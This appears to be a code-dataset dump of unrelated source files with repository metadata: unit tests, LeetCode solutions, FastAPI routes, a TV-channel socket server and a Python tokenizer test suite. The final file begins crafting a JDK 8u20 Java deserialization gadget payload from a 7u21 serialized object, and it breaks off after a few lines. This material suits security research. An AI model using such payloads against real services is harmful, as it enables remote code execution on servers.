| 46.842105 | 138 | 0.830337 | 123 | 890 | 5.739837 | 0.463415 | 0.056657 | 0.101983 | 0.065156 | 0.11898 | 0.11898 | 0.11898 | 0.11898 | 0 | 0 | 0 | 0.051661 | 0.086517 | 890 | 18 | 139 | 49.444444 | 0.816728 | 0.514607 | 0 | 0 | 0 | 0 | 0.464286 | 0.464286 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17b8f007031e6b77982d4da9880cd3ac7fe940b3 | 1,717 | py | Python | test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 12 | 2019-11-06T17:39:10.000Z | 2022-03-01T11:26:19.000Z | test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 8 | 2019-11-06T21:31:11.000Z | 2021-06-02T00:46:50.000Z | test/unit/messages/bloxroute/test_abstract_bloxroute_message.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 5 | 2019-11-14T18:08:11.000Z | 2022-02-08T09:36:22.000Z | from bxcommon.test_utils.abstract_test_case import AbstractTestCase
from bxcommon import constants
from bxcommon.messages.bloxroute.abstract_bloxroute_message import AbstractBloxrouteMessage
from bxcommon.messages.bloxroute.bloxroute_message_control_flags import BloxrouteMessageControlFlags
class TestAbstractBloxrouteMessage(AbstractTestCase):
def test_asbstract_bloxroute_message(self):
total_msg_len = 1000
msg_type = b"dummy_msg"
payload_len = total_msg_len - constants.BX_HDR_COMMON_OFF - constants.STARTING_SEQUENCE_BYTES_LEN
buffer = bytearray(total_msg_len)
message = AbstractBloxrouteMessage(msg_type=msg_type, payload_len=payload_len, buf=buffer)
raw_bytes = message.rawbytes()
self.assertEqual(total_msg_len, len(raw_bytes))
self.assertEqual(msg_type, message.msg_type())
self.assertEqual(payload_len, message.payload_len())
self.assertEqual(payload_len, len(message.payload()))
self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
message.remove_control_flag(BloxrouteMessageControlFlags.VALID)
self.assertFalse(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
message.set_control_flag(BloxrouteMessageControlFlags.VALID)
self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
# Trying set already set flag
message.set_control_flag(BloxrouteMessageControlFlags.VALID)
self.assertTrue(BloxrouteMessageControlFlags.VALID in BloxrouteMessageControlFlags(message.get_control_flags()))
| 50.5 | 121 | 0.798486 | 178 | 1,717 | 7.404494 | 0.292135 | 0.175266 | 0.033384 | 0.191199 | 0.413505 | 0.377086 | 0.377086 | 0.377086 | 0.377086 | 0.307284 | 0 | 0.00269 | 0.133955 | 1,717 | 33 | 122 | 52.030303 | 0.883658 | 0.015725 | 0 | 0.217391 | 0 | 0 | 0.005332 | 0 | 0 | 0 | 0 | 0 | 0.347826 | 1 | 0.043478 | false | 0 | 0.173913 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17c11d2e03854c10df90cd4aba0694838e082d86 | 1,359 | py | Python | LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | class Solution:
# @param {integer} k
# @param {integer} n
# @return {integer[][]}
def combinationSum3(self, k, n):
nums = range(1, 10)
self.results = []
self.combination(nums, n, k, 0, [])
return self.results
def combination(self, nums, target, k, start, result):
if k <= 0 :
return
elif k == 1:
for i in nums:
if i == target:
self.results.append([i])
elif k == 2:
end = len(nums) - 1
while start < end:
s = nums[start] + nums[end]
if s == target:
result.append(nums[start])
result.append(nums[end])
self.results.append(result[:])
result.pop()
result.pop()
start += 1
elif s < target:
start += 1
else:
#s > target
end -= 1
else:
for i in range(start, len(nums)-1):
t = target - nums[i]
if t >= nums[i+1]:
result.append(nums[i])
self.combination(nums, t, k -1, i + 1, result )
result.pop()
else:
break | 28.3125 | 67 | 0.382634 | 137 | 1,359 | 3.79562 | 0.255474 | 0.084615 | 0.092308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02381 | 0.505519 | 1,359 | 48 | 68 | 28.3125 | 0.75 | 0.050773 | 0 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0 | 0 | 0.135135 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17c5738139be0ff3cd10e6b345ccee28c0202628 | 752 | py | Python | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | wyaadarsh/LeetCode-Solutions | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | [
"MIT"
] | 5 | 2020-07-24T17:48:59.000Z | 2020-12-21T05:56:00.000Z | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | null | null | null | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | 2 | 2020-07-24T17:49:01.000Z | 2020-08-31T19:57:35.000Z | class Solution {
public:
bool leadsToDestination(int n, vector<vector<int>>& edges, int source, int destination) {
for(auto & edge : edges) {
int u = edge[0], v = edge[1];
graph[u].push_back(v);
}
vector<bool> visited(n, false);
return dfs(source, destination, visited);
}
private:
bool dfs(int node, int target, vector<bool> & visited) {
if (graph.find(node) == graph.end()) return node == target;
visited[node] = true;
for (int nei : graph[node]) {
if (visited[nei] || !dfs(nei, target, visited))
return false;
}
visited[node] = false;
return true;
}
unordered_map<int, vector<int>> graph;
};
| 30.08 | 93 | 0.542553 | 88 | 752 | 4.613636 | 0.397727 | 0.044335 | 0.083744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003906 | 0.319149 | 752 | 24 | 94 | 31.333333 | 0.789063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17d69728ccc0d7694c2df558651b0fdf5636b10f | 2,048 | py | Python | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | from typing import List, Optional
from attr import dataclass
from fastapi import APIRouter, Security
from fastapi.exceptions import HTTPException
from fastapi import Header
from pydantic import BaseModel
from pydantic.tools import parse_obj_as
from splash.api.auth import get_current_user
from splash.service import SplashMetadata
from splash.service.base import ObjectNotFoundError
from ..users import User
from . import NewTeam, Team
from .teams_service import TeamsService
teams_router = APIRouter()
@dataclass
class Services():
teams: TeamsService
services = Services(None)
def set_teams_service(svc: TeamsService):
services.teams = svc
class CreateTeamResponse(BaseModel):
uid: str
splash_md: SplashMetadata
@teams_router.get("", tags=["teams"], response_model=List[Team])
def read_teams(
page: int = 1,
page_size: int = 100,
current_user: User = Security(get_current_user)):
results = services.teams.retrieve_multiple(current_user, page=page, page_size=page_size)
return parse_obj_as(List[Team], list(results))
@teams_router.get("/{uid}", tags=['teams'], response_model=Team)
def read_team(
uid: str,
current_user: User = Security(get_current_user)):
team = services.teams.retrieve_one(current_user, uid)
return team
@teams_router.post("", tags=['teams'], response_model=CreateTeamResponse)
def create_team(
team: NewTeam,
current_user: User = Security(get_current_user)):
response = services.teams.create(current_user, team)
return response
@teams_router.put("/{uid}", tags=['teams'])
def update_team(uid: str,
team: NewTeam,
current_user: User = Security(get_current_user),
response_model=CreateTeamResponse,
if_match: Optional[str] = Header(None)):
try:
response = services.teams.update(current_user, team, uid, etag=if_match)
except ObjectNotFoundError:
raise HTTPException(404)
return response
| 28.054795 | 92 | 0.70752 | 249 | 2,048 | 5.634538 | 0.281125 | 0.101924 | 0.049893 | 0.065574 | 0.132573 | 0.132573 | 0.132573 | 0.079829 | 0.079829 | 0.079829 | 0 | 0.004271 | 0.199707 | 2,048 | 72 | 93 | 28.444444 | 0.851739 | 0 | 0 | 0.132075 | 0 | 0 | 0.015625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09434 | false | 0 | 0.245283 | 0 | 0.509434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
17da768787ed79973072983b3cce0e340bf8fc26 | 1,304 | py | Python | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | 1 | 2019-02-23T06:41:58.000Z | 2019-02-23T06:41:58.000Z | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | null | null | null | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | null | null | null | """
Handles all requests that coming from phone
"""
import socketserver
import bot
from bot import TVBot
class TCPSocketHandler(socketserver.StreamRequestHandler):
"""
Handles the tcp socket connection
"""
def handle(self):
self.bot = TVBot()
while True:
self.data = self.rfile.readline()
if not self.data:
break
self.data = self.data.decode()
if "STAR" in self.data.upper():
self.bot.open(bot.TV_STAR)
elif "ATV" in self.data.upper():
self.bot.open(bot.TV_ATV)
elif "KANAL D" in self.data.upper() or "KANALD" in self.data.upper():
self.bot.open(bot.TV_KANALD)
elif "TRT" in self.data.upper():
self.bot.open(bot.TV_TRT)
elif "FOX" in self.data.upper():
self.bot.open(bot.TV_FOX)
elif "SHOW TV" in self.data.upper() or "SHOW" in self.data.upper():
self.bot.open(bot.TV_SHOW)
elif "TV2" in self.data.upper() or "TV 2" in self.data.upper():
self.bot.open(bot.TV_TV2)
elif "KAPAT" in self.data.upper() or "CLOSE" in self.data.upper():
self.bot.close()
self.bot.close()
| 34.315789 | 81 | 0.537577 | 170 | 1,304 | 4.082353 | 0.282353 | 0.184438 | 0.172911 | 0.259366 | 0.442363 | 0.34438 | 0.31268 | 0.31268 | 0.31268 | 0 | 0 | 0.00348 | 0.338957 | 1,304 | 37 | 82 | 35.243243 | 0.801624 | 0.059049 | 0 | 0.071429 | 0 | 0 | 0.045188 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.107143 | 0 | 0.178571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17de742785e7e376b1d10db620dbbd2f43d27408 | 15,752 | py | Python | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test case for pyparser."""
from __future__ import division, print_function
import os
import re
import textwrap
import tokenize
from future.builtins import open
import pyparser
def _make_tuple(op):
return lambda x: (op, x)
NL = tokenize.NL
NEWLINE = tokenize.NEWLINE
NAME = _make_tuple(tokenize.NAME)
OP = _make_tuple(tokenize.OP)
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
COMMENT = tokenize.COMMENT
STRING = tokenize.STRING
NUMBER = tokenize.NUMBER
END = tokenize.ENDMARKER
token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT",
STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"}
Ws = pyparser.Whitespace
Comment = pyparser.Comment
Comment_banner = (pyparser.Comment, "banner")
Comment_code = (pyparser.Comment, "code")
Docstring = pyparser.Docstring
Import_future = (pyparser.ImportBlock, "future")
Import_stdlib = (pyparser.ImportBlock, "stdlib")
Import_3rdpty = (pyparser.ImportBlock, "third-party")
Import_1stpty = (pyparser.ImportBlock, "first-party")
Expression = pyparser.Expression
Function = (pyparser.Callable, "def")
Class = (pyparser.Callable, "class")
def assert_same_code(code1, code2):
"""Verify whether 2 code fragments are identical, and if not print an error message."""
regex = re.compile(r"\s+\\$", re.M)
code1 = re.sub(regex, r"\\", code1)
code2 = re.sub(regex, r"\\", code2)
if code2 != code1:
print()
lines_code1 = code1.splitlines()
lines_code2 = code2.splitlines()
n_diffs = 0
for i in range(len(lines_code1)):
old_line = lines_code1[i]
new_line = lines_code2[i] if i < len(lines_code2) else ""
if old_line != new_line:
print("%3d - %s" % (i + 1, old_line))
print("%3d + %s" % (i + 1, new_line))
n_diffs += 1
if n_diffs == 5: break
raise AssertionError("Unparsed code1 does not match the original.")
def test_tokenization():
"""
Test function for ``pyparser._normalize_tokens()``.
Even though this function is private, it is extremely important to verify that it behaves correctly. In
particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it
fixes all the problems that the original tokenizer has.
"""
# Helper functions
def _parse_to_tokens(text):
"""Parse text into tokens and then normalize them."""
gen = iter(text.splitlines(True)) # True = keep newlines
readline = gen.next if hasattr(gen, "next") else gen.__next__
return pyparser._tokenize(readline)
def _unparse_tokens(tokens):
"""Convert tokens back into the source code."""
return tokenize.untokenize(t.token for t in tokens)
def _assert_tokens(tokens, target):
"""Check that the tokens list corresponds to the target provided."""
for i in range(len(tokens)):
assert i < len(target), "Token %d %r not expected" % (i, tokens[i])
tok = tokens[i]
trg = target[i]
valid = False
if isinstance(trg, int):
if tok.op == trg: valid = True
name = token_names[trg]
elif isinstance(trg, tuple) and len(trg) == 2:
if tok.op == trg[0] and tok.str == trg[1]: valid = True
name = "%s(%s)" % (token_names[trg[0]], trg[1])
else:
assert False, "Unknown target: %r" % trg
if not valid:
assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name)
assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target))
def check_code(code, expected_tokens=None, filename=None):
"""Test parsing of the given piece of code."""
code = textwrap.dedent(code)
if filename:
print("Testing tokenization of %s:" % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing tokenization %d:" % check_code.index, end=" ")
tokens = _parse_to_tokens(code)
try:
try:
unparsed = _unparse_tokens(tokens)
except ValueError as e:
raise AssertionError("Cannot unparse tokens: %s" % e)
assert_same_code(code, unparsed)
if expected_tokens:
_assert_tokens(tokens, expected_tokens)
print("ok")
except AssertionError as e:
print(u"Error: %s" % e)
print(u"Original code fragment:\n" + code)
print("Tokens:")
for i, tok in enumerate(tokens):
print("%3d %r" % (i, tok))
raise
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
def func():
# function
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def func(): # function
# hanging comment
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def foo():
pass
#comment
def bar():
pass
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def hello():
print("hello")
""", [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL,
NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo:
def foo(self):
pass
def bar(self):
return
""", [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("),
NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"),
NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT,
DEDENT, END])
check_code("""
def foo():
# Attempt to create the output directory
try:
os.makedirs(destdir)
except OSError as e:
raise
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"),
OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"),
NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT,
NAME("raise"), NEWLINE, DEDENT, DEDENT, END])
check_code("""
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
print("I'm done.")
""", [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"),
OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL,
DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE,
COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END])
check_code("""
def test3():
x = 1
# bad
print(x)
""", [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="),
NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo(object):
#-------------
def bar(self):
if True:
pass
# Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel
# all the way up across multiple comments.
# comment 3
# commmmmmmment 4
@decorator
""", [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT,
COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT,
NL, OP("@"), NAME("decorator"), NEWLINE, END])
# Really, one should avoid code like this.... It won't break the normalizer, but may create problems down
# the stream.
check_code("""
if True:
if False:
# INDENT will be inserted before this comment
raise
# DEDENT will be after this comment
else:
praise()
""", [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE,
INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE,
INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END])
for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
def test_pyparser():
"""Test case: general parsing."""
def _check_blocks(actual, expected):
assert actual, "No parse results"
for i in range(len(actual)):
assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i])
valid = False
if isinstance(expected[i], type):
if isinstance(actual[i], expected[i]): valid = True
elif isinstance(expected[i], tuple):
if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True
if not valid:
assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i])
def check_code(code, blocks=None, filename=None):
code = textwrap.dedent(code)
if not code.endswith("\n"): code += "\n"
if filename:
print("Testing file %s..." % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing code fragment %d..." % check_code.index, end=" ")
preparsed = None
parsed = None
unparsed = None
try:
preparsed = pyparser.parse_text(code)
parsed = preparsed.parse(2)
try:
unparsed = parsed.unparse()
except ValueError as e:
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise AssertionError("Cannot unparse code: %s" % e)
assert_same_code(code, unparsed)
if blocks:
_check_blocks(parsed.parsed, blocks)
print("ok")
except AssertionError as e:
print()
print(u"Error: " + str(e))
print(u"Original code fragment:\n" + code)
if unparsed: print(u"Unparsed code:\n" + unparsed)
if parsed:
print(parsed)
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise
except Exception as e:
print()
print(u"Error: " + str(e))
if preparsed:
print("Preparsed tokens:")
for i, tok in enumerate(preparsed.tokens):
print("%4d %r" % (i, tok))
else:
print("Initial parsing has failed...")
raise
check_code("""
# -*- encoding: utf-8 -*-
# copyright: 2016 h2o.ai
\"\"\"
A code example.
It's not supposed to be functional, or even functionable.
\"\"\"
from __future__ import braces, antigravity
# Standard library imports
import sys
import time
import this
import h2o
from h2o import H2OFrame, init
from . import *
# Do some initalization for legacy python versions
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
class Foo(object):
#------ Public -------------------------------------------------------------
def bar(self):
pass
# def foo():
# print(1)
#
# print(2)
# comment 2
@decorated(
1, 2, (3))
@dddd
def bar():
# be
# happy
print("bar!")
# bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression,
Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws])
for directory in [".", "../../h2o-py", "../../py"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
# test_tokenization()
test_pyparser()
| 38.702703 | 117 | 0.509777 | 1,753 | 15,752 | 4.517399 | 0.180833 | 0.034095 | 0.047354 | 0.047986 | 0.398661 | 0.350044 | 0.29928 | 0.274151 | 0.226923 | 0.202425 | 0 | 0.00731 | 0.322562 | 15,752 | 406 | 118 | 38.79803 | 0.734795 | 0.054977 | 0 | 0.39528 | 0 | 0.00295 | 0.308362 | 0.014915 | 0 | 0 | 0 | 0 | 0.050147 | 1 | 0.029499 | false | 0.073746 | 0.058997 | 0.00295 | 0.100295 | 0.103245 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
17e137bb0de594618d6979cb258b74fc8c2fc07c | 353 | py | Python | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-07-03 21:26
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='room',
old_name='created_app',
new_name='created_at',
),
]
| 18.578947 | 45 | 0.575071 | 38 | 353 | 5.184211 | 0.815789 | 0.111675 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 0.311615 | 353 | 18 | 46 | 19.611111 | 0.736626 | 0.121813 | 0 | 0 | 1 | 0 | 0.12987 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17e2be1570ac1669d8bc94548067cec13cd745f2 | 2,049 | py | Python | tests/test8u20/main.py | potats0/javaSerializationTools | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 124 | 2021-01-21T08:49:20.000Z | 2022-01-23T07:17:30.000Z | tests/test8u20/main.py | potats0/javaSerializationDump | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 3 | 2021-01-22T03:29:55.000Z | 2021-04-20T06:04:50.000Z | tests/test8u20/main.py | potats0/javaSerializationTools | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 12 | 2021-01-21T14:09:01.000Z | 2021-11-18T20:13:43.000Z | import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
with open("../files/7u21.ser", "rb") as f:
a = ObjectRead(f)
obj = a.readContent()
# 第一步,向HashSet添加一个假字段,名字fake
signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
fakeSignature = {'name': 'fake', 'signature': signature}
obj.javaClass.superJavaClass.fields.append(fakeSignature)
# 构造假的BeanContextSupport反序列化对象,注意要引用后面的AnnotationInvocationHandler
# 读取BeanContextSupportClass的类的简介
